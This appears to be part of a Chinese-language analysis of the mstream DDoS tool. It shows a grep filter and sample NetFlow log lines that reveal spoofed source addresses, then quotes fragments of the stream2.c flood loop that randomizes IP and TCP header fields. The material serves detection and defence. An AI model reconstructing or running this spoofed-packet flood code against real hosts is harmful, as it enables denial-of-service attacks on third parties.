分布式拒绝服务攻击工具mstream(2)

核心提示： 对Cisco Net Flows产生的日志使用如下命令(过滤点分十进制中含有0的IP地址)可以发觉攻击的存在--% grep "[ \.]0[ \.(]" ddos-000415Apr 15 04:12:08 tcp 82.0.151.5(29497) -> 19

对Cisco Net Flows产生的日志使用如下命令(过滤点分十进制中含有0的IP地址)可以发觉攻击的存在

--------------------------------------------------------------------------
% grep "[ \.]0[ \.(]" ddos-000415
Apr 15 04:12:08 tcp 82.0.151.5(29497) -> 192.168.10.5(27072), 1 packet
Apr 15 04:12:18 tcp 207.0.149.32(21893) -> 192.168.10.5(3913), 1 packet
Apr 15 04:12:33 tcp 0.147.151.82(10473) -> 10.4.152.237(2810), 1 packet
Apr 15 04:13:39 tcp 60.0.33.36(41079) -> 10.4.152.237(31754), 1 packet
Apr 15 04:14:03 tcp 103.140.148.0(4247) -> 10.4.152.237(29689), 1 packet
Apr 15 04:14:15 tcp 214.1.99.0(46714) -> 10.4.152.237(22524), 1 packet
Apr 15 04:15:11 tcp 10.148.60.0(12276) -> 192.168.10.5(31122), 1 packet
Apr 15 04:15:20 tcp 0.112.67.108(4550) -> 192.168.10.5(63787), 1 packet
Apr 15 04:15:33 tcp 13.0.16.2(39092) -> 10.4.152.237(57998), 1 packet
. . .
Apr 15 06:45:24 tcp 18.167.171.0(54104) -> 10.200.5.8(32779), 1 packet
Apr 15 06:45:52 tcp 0.23.15.38(45621) -> 10.200.5.8(20780), 1 packet
Apr 15 06:46:14 tcp 0.12.109.77(38670) -> 10.200.5.8(47776), 1 packet
Apr 15 07:19:12 tcp 199.120.0.72(64912) -> 10.4.152.237(45151), 1 packet
Apr 15 07:27:37 tcp 0.28.232.21(52533) -> 10.4.152.237(338), 1 packet
Apr 15 07:28:13 tcp 99.61.233.0(20951) -> 10.4.152.237(58427), 1 packet
Apr 15 07:31:23 tcp 195.0.3.111(17193) -> 10.4.152.237(14601), 1 packet
Apr 15 07:32:19 tcp 61.108.245.0(24309) -> 10.4.152.237(32809), 1 packet
--------------------------------------------------------------------------

应该提醒的是某些伪造得到的源IP是广播地址、组播地址、子网地址，这将产生一些其它问题(参考资源[12])。

分析stream2.c的源代码，IP、TCP层的很多头部信息被随机化了，但还是有一些静态值

packet.ip.ip_id = rand();
. . .
packet.tcp.th_win = htons(16384);
. . .
packet.tcp.th_seq = random();
. . .
packet.tcp.th_sport = rand();
packet.tcp.th_dport = rand();
. . .
while ( time( 0 ) <= endtime )
{
if ( floodtype != 0 )
{
i = 0;
/*
* until list exhausted
*/
while ( arg4[i] != NULL )
{
/*
* valid ip
*/
if ( strchr( arg4[i], '.' ) != NULL )
{
packet.ip.ip_dst.s_addr = inet_addr(arg4[i]);
cksum.pseudo.daddr = inet_addr(arg4[i]);
s_sin.sin_addr.s_addr = inet_addr(arg4[i]);
cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random();
packet.ip.ip_id++;
packet.tcp.th_sport++;
packet.tcp.th_seq++;
s_in.sin_port = packet.tcp.th_dport = rand();
. . .
}
}
}
}